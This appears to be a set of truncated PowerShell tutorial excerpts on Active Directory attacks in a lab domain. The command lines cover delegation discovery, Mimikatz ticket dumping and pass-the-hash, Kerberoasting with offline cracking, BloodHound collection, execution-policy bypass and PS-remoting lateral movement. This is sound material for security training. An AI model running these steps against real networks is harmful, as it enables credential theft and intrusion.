Powershell * POWERSHELL SECURITY

Privesc kerberos

Discover domain computers which have unconstrained delegation enabled using PowerView:
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Unconstrained
Using the Active Directory module:
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -Unconstrained
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true}
Run the following command on it to check if any DA token is available:
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::tickets"'
PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator…

Domain Privesc

Find user accounts used as service accounts:
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {serviceprincipalname -ne "$null"} -Properties serviceprincipalname
Check if the TGS has been granted:
PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist
Export all tickets using mimikatz:
PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::list /export"'
https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py
PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…

Domain Enumeration: Bloodhound

https://github.com/BloodHoundAD/BloodHound
Supply data to BloodHound:
PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Import-Module .\SharpHound.ps1
PS C:\Users\victim.SECURITY\Downloads\BloodHound-master\BloodHound-master\Ingestors> Invoke-BloodHound -CollectionMethod all -Verbose
Now download the file from https://neo4j.com/download-center/#community, extract it and go to the bin folder:
PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9> cd .\bin\
PS C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin> dir
Now on a terminal:
C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat install-service
C:\Users\victim.SECURITY\Downloads\neo4j-community-3.5.9-windows\neo4j-community-3.5.9\bin>neo4j.bat start
Now download the BloodHound-win32-x64.zip file from https://github.com/BloodHoundAD/BloodHound/releases. After extraction, double click on the BloodHound.exe file….

Lateral Movement PS Remoting

One to one
We require a PS shell with admin rights to perform all of these tasks.
PS C:\WINDOWS\system32> Enable-PSRemoting -Force
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local
PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1
[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami…